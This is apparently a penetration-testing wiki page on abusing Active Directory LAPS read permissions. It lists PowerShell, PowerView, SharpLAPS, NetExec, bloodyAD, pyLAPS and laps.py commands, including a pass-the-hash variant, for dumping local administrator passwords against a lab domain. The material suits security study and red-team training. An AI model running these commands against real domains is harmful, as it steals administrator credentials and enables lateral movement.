ReadLAPSPassword

Microsoft Local Administrator Password Solution (LAPS) is a Windows security feature designed to manage and protect local administrator credentials on domain-joined systems. It automatically generates strong, random passwords for local administrator accounts and rotates them regularly, with a default rotation period of 30 days.

Each managed device runs a LAPS client that periodically updates the local administrator password. After the password is changed, it is securely stored in Active Directory as an attribute of the corresponding computer object. In the legacy implementation, this attribute is called ms-MCS-AdmPwd.

Administrators can retrieve the current password using the LAPS management interface or PowerShell. Access to this information is strictly controlled: only users or groups with explicit permission to read the attribute are able to view the stored password.

An attacker can access the ms-MCS-AdmPwd attribute if they compromise an account that directly has this permission or has either GenericAll or AllExtendedRights rights over a target computer configured with LAPS.

Windows

The LAPS password can be read using the PowerShell cmdlets, PowerView, or SharpLAPS.

# Active Directory PowerShell module
Get-ADComputer -Identity DC01 -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# PowerView
Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# SharpLAPS
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

# Enumerate all LAPS-enabled hosts (PowerView)
Get-DomainComputer -Properties name | ForEach-Object {$computer=$_.name $obj=Get-DomainObject -Identity $computer -Properties "ms-mcs-AdmPwd",name -ErrorAction SilentlyContinue if($obj.'ms-mcs-AdmPwd'){Write-Output "$computer`: $($obj.'ms-mcs-AdmPwd')"}}

Linux

The LAPS password can be read from a Linux host via NetExec, BloodyAD, pyLAPS, or LAPSDumper.

#---------#
# NetExec #
#---------#

# Read the password of all computers (or specify a target host)
nxc ldap 10.10.10.5 -u x7331 -p 'Passw0rd123!' -M laps [-o COMPUTER='DC01$']

pyLAPS.py --action get [--computer 'DC01$'] -u x7331 -d marvel.local -p 'Passw0wrd123!' --dc-ip 10.10.10.5

# BloodyAD
bloodyAD -u x7331 -d marvel.local -p 'Passw0rd123!' --host 10.10.10.5 get object 'DC01$' --attr ms-Mcs-AdmPwd

# Basic usage
python laps.py -u x7331 -p 'Passw0rd123!' -d marvel.local

# PtH on specific LDAP server
python laps.py -u x7331 -p <hash> -d marvel.local -l dc01.marvel.local

For an example of reading the LAPS password with NetExec, see Timelapse.

PreviousReadGMSAPassword NextWriteOwner

Last updated 26 days ago

hashtagWindows

hashtagLinux

Windows

Linux